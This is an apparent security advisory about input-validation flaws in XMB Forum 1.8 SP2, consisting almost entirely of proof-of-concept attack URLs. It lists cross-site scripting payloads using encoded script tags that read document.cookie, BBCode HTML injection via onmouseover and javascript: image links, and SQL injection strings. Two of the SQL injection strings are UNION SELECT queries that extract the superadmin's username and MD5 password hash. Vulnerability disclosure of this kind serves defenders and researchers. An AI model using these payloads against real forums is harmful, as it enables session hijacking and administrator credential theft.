|
XMB Forum Multiple Input Validation Vulnerabilities
The following proof of concept has been supplied: Cross-Site Scripting: http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript> http://www.example.com/xmb18sp2/member.php?action=viewpro&member=x<%73cript>alert(document.cookie);</%73cript> http://www.example.com/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);</%73cript> http://www.example.com/xmb18sp2/editprofile.php?user=x"><%73cript>alert(document.cookie);</%73cript> HTML Injection: text1 [align=center onmouseover=alert(document.cookie);] text2 [/align] text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2 SQL Injection: http://www.example.com/xmb18sp2/viewthread.php?tid=1&ppp=x http://www.example.com/xmb18sp2/misc.php?action=list&order=postnum&desc=x http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&tpp=x http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x http://www.example.com/xmb18sp2/stats.php?action=view&addon=x Getting username for superadmin: http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,username FROM xmb_members WHERE uid=1 LIMIT 1/* Getting password's md5 hash for superadmin: http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/* |
|
 Privacy Statement |
